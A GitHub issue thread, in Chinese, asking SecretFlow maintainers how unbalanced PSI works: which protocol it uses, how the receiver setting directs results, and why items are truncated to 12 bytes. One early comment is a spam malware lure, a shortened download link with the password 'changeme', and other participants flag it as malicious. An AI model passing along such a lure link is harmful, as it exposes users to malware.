### ISSUE TITLE
非平衡求交相关问题

### ISSUE THREAD

**Issue by wjwJack** [secretflow/secretflow#1514]
### Issue Type

Feature Request

### Source

binary

### Secretflow Version

使用docker方式按latest方式安装的secretflow

### OS Platform and Distribution

麒麟V10

### Python version

3.10.13   docker方式安装

### What happend and What you expected to happen.

```shell
使用隐语非平衡求交白皮书中（https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b1/developer/benchmark/ubpsi_benchmark）的offline、online脚本，进行了求交，可以正常完成求交。

有一些相关非平衡求交的问题，想在请教下：
1，非平衡求交协议使用的是ecdh的oprf协议还是脚本中的spu.spu_pb2.SEMI2K？
2，对于非平衡求交还有没有其他协议，从哪里看？有没有非平衡相关更多的文档可以查看？
3，数据流向是怎样的，是小数据量流向大数据，还是大数据流向小数据？
```

### Reproduction code to reproduce the issue.

```shell
隐语非平衡求交问题如上
```

**Comment by SagarChandra07** [comment]
download
https://bit.ly/47P0Nvo

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by wjwJack** [comment]
> download https://bit.ly/47P0Nvo
> 
> Password: changeme If you don't have the c compliator, install it.(gcc or clang)

这是什么？

**Comment by tpppppub** [comment]
> > download https://bit.ly/47P0Nvo
> > Password: changeme If you don't have the c compliator, install it.(gcc or clang)
> 
> 这是什么？

这是机器人投毒的恶意软件，请勿下载

**Comment by wjwJack** [comment]
> > > download https://bit.ly/47P0Nvo
> > > Password: changeme If you don't have the c compliator, install it.(gcc or clang)
> > 
> > 
> > 这是什么？
> 
> 这是机器人投毒的恶意软件，请勿下载

嗯嗯，不明文件、链接，没点。

**Comment by lanyy9527** [comment]
1. 使用的是ecdh的oprf协议；
2. 目前实现的只有oprf协议，更多文章可关注微信公众号「隐语的小剧场」查看更多非平衡psi内容；
3. 都可以，不过推荐在小数据方获得求交结果，这样online时间缩短一倍，具体可以查看[ubpsi性能测试](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)；

**Comment by wjwJack** [comment]
> 1. 使用的是ecdh的oprf协议；
> 
>     2. 目前实现的只有oprf协议，更多文章可关注微信公众号「隐语的小剧场」查看更多非平衡psi内容；
> 
>     3. 都可以，不过推荐在小数据方获得求交结果，这样online时间缩短一倍，具体可以查看[ubpsi性能测试](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)；

感谢老师的回复，追问一下：
1，公众号「隐语的小剧场」已关注了，但感觉不聚焦非平衡，如果非平衡求交还有更多的类似[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)的文档就更好了。

2，我是参考[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)写的脚本，像您说的“推荐在小数据方获得求交结果”，是大数据流方把待求交数据流向小数据方做数据求交是吗？这块脚本中 是在哪控制的，[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)，这里面的脚本

**Comment by lanyy9527** [comment]
> > 1. 使用的是ecdh的oprf协议；
> >    
> >    2. 目前实现的只有oprf协议，更多文章可关注微信公众号「隐语的小剧场」查看更多非平衡psi内容；
> >    3. 都可以，不过推荐在小数据方获得求交结果，这样online时间缩短一倍，具体可以查看[ubpsi性能测试](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)；
> 
> 感谢老师的回复，追问一下： 1，公众号「隐语的小剧场」已关注了，但感觉不聚焦非平衡，如果非平衡求交还有更多的类似[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)的文档就更好了。
> 
> 2，我是参考[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)写的脚本，像您说的“推荐在小数据方获得求交结果”，是大数据流方把待求交数据流向小数据方做数据求交是吗？这块脚本中 是在哪控制的，[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)，这里面的脚本

收到您的反馈～
可以修改 receiver=alice or receiver=bob 进行控制

**Comment by wjwJack** [comment]
> > > 1. 使用的是ecdh的oprf协议；
> > >    
> > >    2. 目前实现的只有oprf协议，更多文章可关注微信公众号「隐语的小剧场」查看更多非平衡psi内容；
> > >    3. 都可以，不过推荐在小数据方获得求交结果，这样online时间缩短一倍，具体可以查看[ubpsi性能测试](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)；
> > 
> > 
> > 感谢老师的回复，追问一下： 1，公众号「隐语的小剧场」已关注了，但感觉不聚焦非平衡，如果非平衡求交还有更多的类似[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)的文档就更好了。
> > 2，我是参考[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)写的脚本，像您说的“推荐在小数据方获得求交结果”，是大数据流方把待求交数据流向小数据方做数据求交是吗？这块脚本中 是在哪控制的，[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)，这里面的脚本
> 
> 收到您的反馈～ 可以修改 receiver=alice or receiver=bob 进行控制

@lanyy9527 老师，我统计了下receiver=bob和receiver=carol的两种情况，具体情况见下图，可以看到，在小数据方获得求交结果的总体时间短于在大数据方获得求交结果的时间。 能讲一下求教原理吗？  是大数据流方把待求交数据流向小数据方做数据求交，还是反之？
![图片](https://github.com/user-attachments/assets/218830bb-3c98-480a-8561-e42656e39cba)

**Comment by wjwJack** [comment]
> > > 1. 使用的是ecdh的oprf协议；
> > >    
> > >    2. 目前实现的只有oprf协议，更多文章可关注微信公众号「隐语的小剧场」查看更多非平衡psi内容；
> > >    3. 都可以，不过推荐在小数据方获得求交结果，这样online时间缩短一倍，具体可以查看[ubpsi性能测试](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)；
> > 
> > 
> > 感谢老师的回复，追问一下： 1，公众号「隐语的小剧场」已关注了，但感觉不聚焦非平衡，如果非平衡求交还有更多的类似[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)的文档就更好了。
> > 2，我是参考[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)写的脚本，像您说的“推荐在小数据方获得求交结果”，是大数据流方把待求交数据流向小数据方做数据求交是吗？这块脚本中 是在哪控制的，[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)，这里面的脚本
> 
> 收到您的反馈～ 可以修改 receiver=alice or receiver=bob 进行控制

@lanyy9527 老师，我统计了下receiver=bob和receiver=carol的两种情况，具体情况见下图，可以看到，在小数据方获得求交结果的总体时间短于在大数据方获得求交结果的时间。 能讲一下求教原理吗？ 是大数据流方把待求交数据流向小数据方做数据求交，还是反之？
![图片](https://github.com/user-attachments/assets/cd3dbd61-d8bf-403e-871a-2e7bbcae29fd)

**Comment by lanyy9527** [comment]
> > > > 1. 使用的是ecdh的oprf协议；
> > > >    
> > > >    2. 目前实现的只有oprf协议，更多文章可关注微信公众号「隐语的小剧场」查看更多非平衡psi内容；
> > > >    3. 都可以，不过推荐在小数据方获得求交结果，这样online时间缩短一倍，具体可以查看[ubpsi性能测试](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)；
> > > 
> > > 
> > > 感谢老师的回复，追问一下： 1，公众号「隐语的小剧场」已关注了，但感觉不聚焦非平衡，如果非平衡求交还有更多的类似[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)的文档就更好了。
> > > 2，我是参考[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)写的脚本，像您说的“推荐在小数据方获得求交结果”，是大数据流方把待求交数据流向小数据方做数据求交是吗？这块脚本中 是在哪控制的，[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)，这里面的脚本
> > 
> > 
> > 收到您的反馈～ 可以修改 receiver=alice or receiver=bob 进行控制
> 
> @lanyy9527 老师，我统计了下receiver=bob和receiver=carol的两种情况，具体情况见下图，可以看到，在小数据方获得求交结果的总体时间短于在大数据方获得求交结果的时间。 能讲一下求教原理吗？ 是大数据流方把待求交数据流向小数据方做数据求交，还是反之？ ![图片](https://private-user-images.githubusercontent.com/8414952/371842324-cd3dbd61-d8bf-403e-871a-2e7bbcae29fd.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mjc2MDI2MTAsIm5iZiI6MTcyNzYwMjMxMCwicGF0aCI6Ii84NDE0OTUyLzM3MTg0MjMyNC1jZDNkYmQ2MS1kOGJmLTQwM2UtODcxYS0yZTdiYmNhZTI5ZmQucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDkyOSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA5MjlUMDkzMTUwWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9OTk3NjljNDNjMzg5NTVkMWUyZDU2N2FhNDE1MDZiZTI4NjZiZDQyOTQyMDBkNDhmMjhmNzBjODFmZmEzMTRhOCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QifQ.0cMdF5F3H8XxMXkQNcHx1L_xiOP4Ui1HJkNWS2srdYs)

可以参考官网：https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/user_guide/psi#unbalanced-psi

**Comment by wjwJack** [comment]
> > > > > 1. 使用的是ecdh的oprf协议；
> > > > >    
> > > > >    2. 目前实现的只有oprf协议，更多文章可关注微信公众号「隐语的小剧场」查看更多非平衡psi内容；
> > > > >    3. 都可以，不过推荐在小数据方获得求交结果，这样online时间缩短一倍，具体可以查看[ubpsi性能测试](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)；
> > > > 
> > > > 
> > > > 感谢老师的回复，追问一下： 1，公众号「隐语的小剧场」已关注了，但感觉不聚焦非平衡，如果非平衡求交还有更多的类似[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)的文档就更好了。
> > > > 2，我是参考[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)写的脚本，像您说的“推荐在小数据方获得求交结果”，是大数据流方把待求交数据流向小数据方做数据求交是吗？这块脚本中 是在哪控制的，[隐语非平衡(Unbalanced) PSI Benchmark白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/developer/benchmark/ubpsi_benchmark)，这里面的脚本
> > > 
> > > 
> > > 收到您的反馈～ 可以修改 receiver=alice or receiver=bob 进行控制
> > 
> > 
> > @lanyy9527 老师，我统计了下receiver=bob和receiver=carol的两种情况，具体情况见下图，可以看到，在小数据方获得求交结果的总体时间短于在大数据方获得求交结果的时间。 能讲一下求教原理吗？ 是大数据流方把待求交数据流向小数据方做数据求交，还是反之？ ![图片](https://private-user-images.githubusercontent.com/8414952/371842324-cd3dbd61-d8bf-403e-871a-2e7bbcae29fd.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mjc2MDI2MTAsIm5iZiI6MTcyNzYwMjMxMCwicGF0aCI6Ii84NDE0OTUyLzM3MTg0MjMyNC1jZDNkYmQ2MS1kOGJmLTQwM2UtODcxYS0yZTdiYmNhZTI5ZmQucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDkyOSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA5MjlUMDkzMTUwWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9OTk3NjljNDNjMzg5NTVkMWUyZDU2N2FhNDE1MDZiZTI4NjZiZDQyOTQyMDBkNDhmMjhmNzBjODFmZmEzMTRhOCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QifQ.0cMdF5F3H8XxMXkQNcHx1L_xiOP4Ui1HJkNWS2srdYs)
> 
> 可以参考官网：https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b2/user_guide/psi#unbalanced-psi

老师好，在链接中没有说明数据量的问题，因为是非平衡求交，在大数据量一方求交与小数据量一方求交，请问这个是怎么控制的，难道是通过receiver=alice or receiver=bob 进行控制的？

**Comment by wjwJack** [comment]
老师，看看我的理解对不对：
前提：小数据方：alice ；大数据方：bob
描述：
1，offline阶段，大数据方bob通过加密算法得到加密结果，称该加密结果为X，把加密结果X发送到小数据方alice。
2，online阶段，分为两个步骤：
①小数据方通过加密算法得到加密结果，称该加密结果为Y。
②小数据方把X和Y进行求交，获得求交结果Z。
3，再根据receiver=alice or receiver=bob情况，把求交结果Z输出给alice或bob

**Comment by wjwJack** [comment]
> 老师，看看我的理解对不对： 前提：小数据方：alice ；大数据方：bob 描述： 1，offline阶段，大数据方bob通过加密算法得到加密结果，称该加密结果为X，把加密结果X发送到小数据方alice。 2，online阶段，分为两个步骤： ①小数据方通过加密算法得到加密结果，称该加密结果为Y。 ②小数据方把X和Y进行求交，获得求交结果Z。 3，再根据receiver=alice or receiver=bob情况，把求交结果Z输出给alice或bob

@lanyy9527  帮忙确认下，我的理解对不对

**Comment by lanyy9527** [comment]
> > 老师，看看我的理解对不对： 前提：小数据方：alice ；大数据方：bob 描述： 1，offline阶段，大数据方bob通过加密算法得到加密结果，称该加密结果为X，把加密结果X发送到小数据方alice。 2，online阶段，分为两个步骤： ①小数据方通过加密算法得到加密结果，称该加密结果为Y。 ②小数据方把X和Y进行求交，获得求交结果Z。 3，再根据receiver=alice or receiver=bob情况，把求交结果Z输出给alice或bob
> 
> @lanyy9527 帮忙确认下，我的理解对不对

是的，不过在上面的例子中，online阶段求交结果只会输出到receiver方，也就是Alice方；
在offline阶段，receiver=alice，则bob的加密结果会发送到alice；receiver=bob，则alice的加密结果会发送到bob；
在ub psi中，通常offline和online的receiver配置需要保持一致。

**Comment by wjwJack** [comment]
好的，收到，谢谢，顺便再问一下，在下图中，即[隐语非平衡白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b1/developer/benchmark/ubpsi_benchmark)，说截取12B，请问12B并不是全部数据吧，如何保证求交结果的正确性？
![57d97ab66fafe9e2979228943e8ca73](https://github.com/user-attachments/assets/5bc41da5-a4ff-482e-bdab-148c9269b149)

**Comment by lanyy9527** [comment]
> 好的，收到，谢谢，顺便再问一下，在下图中，即[隐语非平衡白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b1/developer/benchmark/ubpsi_benchmark)，说截取12B，请问12B并不是全部数据吧，如何保证求交结果的正确性？ ![57d97ab66fafe9e2979228943e8ca73](https://private-user-images.githubusercontent.com/8414952/375302071-5bc41da5-a4ff-482e-bdab-148c9269b149.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mjg2MTE5NDAsIm5iZiI6MTcyODYxMTY0MCwicGF0aCI6Ii84NDE0OTUyLzM3NTMwMjA3MS01YmM0MWRhNS1hNGZmLTQ4MmUtYmRhYi0xNDhjOTI2OWIxNDkucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MTAxMSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDEwMTFUMDE1NDAwWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MzU3ZmM0YjFkMTY5ZTYwNDExNWI3ZmMzY2NkODNlOWI2ODQwMTljYzEwMDQwNTBhN2IxMjA5MDMxZWFiNzdhMiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QifQ.T-ZXNSQfzuGD7YHyXb9L8WJb7LDN5YncZLgqFv1Quto)

这个结果比较早，可以切换到main分支，查看最新的测试结果；

**Comment by wjwJack** [comment]
> > 好的，收到，谢谢，顺便再问一下，在下图中，即[隐语非平衡白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b1/developer/benchmark/ubpsi_benchmark)，说截取12B，请问12B并不是全部数据吧，如何保证求交结果的正确性？ ![57d97ab66fafe9e2979228943e8ca73](https://private-user-images.githubusercontent.com/8414952/375302071-5bc41da5-a4ff-482e-bdab-148c9269b149.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mjg2MTE5NDAsIm5iZiI6MTcyODYxMTY0MCwicGF0aCI6Ii84NDE0OTUyLzM3NTMwMjA3MS01YmM0MWRhNS1hNGZmLTQ4MmUtYmRhYi0xNDhjOTI2OWIxNDkucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MTAxMSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDEwMTFUMDE1NDAwWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MzU3ZmM0YjFkMTY5ZTYwNDExNWI3ZmMzY2NkODNlOWI2ODQwMTljYzEwMDQwNTBhN2IxMjA5MDMxZWFiNzdhMiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QifQ.T-ZXNSQfzuGD7YHyXb9L8WJb7LDN5YncZLgqFv1Quto)
> 
> 这个结果比较早，可以切换到main分支，查看最新的测试结果；

main分支没有找到非平衡的文档，在1.9.0b2版本中，也是说截取12B，如下图，我就是想弄清楚12B，怎么代表的全部数据，是如何保证求交结果的正确性和完整性的  @lanyy9527 
![图片](https://github.com/user-attachments/assets/4eefdc72-60cd-4a42-a5ac-f685111fb9e1)

**Comment by lanyy9527** [comment]
> > > 好的，收到，谢谢，顺便再问一下，在下图中，即[隐语非平衡白皮书](https://www.secretflow.org.cn/zh-CN/docs/secretflow/v1.9.0b1/developer/benchmark/ubpsi_benchmark)，说截取12B，请问12B并不是全部数据吧，如何保证求交结果的正确性？ ![57d97ab66fafe9e2979228943e8ca73](https://private-user-images.githubusercontent.com/8414952/375302071-5bc41da5-a4ff-482e-bdab-148c9269b149.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mjg2MTE5NDAsIm5iZiI6MTcyODYxMTY0MCwicGF0aCI6Ii84NDE0OTUyLzM3NTMwMjA3MS01YmM0MWRhNS1hNGZmLTQ4MmUtYmRhYi0xNDhjOTI2OWIxNDkucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MTAxMSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDEwMTFUMDE1NDAwWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MzU3ZmM0YjFkMTY5ZTYwNDExNWI3ZmMzY2NkODNlOWI2ODQwMTljYzEwMDQwNTBhN2IxMjA5MDMxZWFiNzdhMiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QifQ.T-ZXNSQfzuGD7YHyXb9L8WJb7LDN5YncZLgqFv1Quto)
> > 
> > 
> > 这个结果比较早，可以切换到main分支，查看最新的测试结果；
> 
> main分支没有找到非平衡的文档，在1.9.0b2版本中，也是说截取12B，如下图，我就是想弄清楚12B，怎么代表的全部数据，是如何保证求交结果的正确性和完整性的 @lanyy9527 ![图片](https://private-user-images.githubusercontent.com/8414952/375620644-4eefdc72-60cd-4a42-a5ac-f685111fb9e1.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mjg2MTk1MTQsIm5iZiI6MTcyODYxOTIxNCwicGF0aCI6Ii84NDE0OTUyLzM3NTYyMDY0NC00ZWVmZGM3Mi02MGNkLTRhNDItYTVhYy1mNjg1MTExZmI5ZTEucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MTAxMSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDEwMTFUMDQwMDE0WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NGVhZWU5ZTY2YTNkMGQyMTU4YzdkZTNmZGQ1OWQ2MjgwOTMxMTU1NTEwYTk3OWMwOTMwYmU0YzllM2MzM2NlMCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QifQ.1yR8LL6EngEw6arnOEaJOewe_-HqcJ-7SqASBiO7abk)

这里指的是截取每个数据的长度到12B（原来每个数据是16B），主要是为了减少通信

**Comment by wjwJack** [comment]
好的，明白了
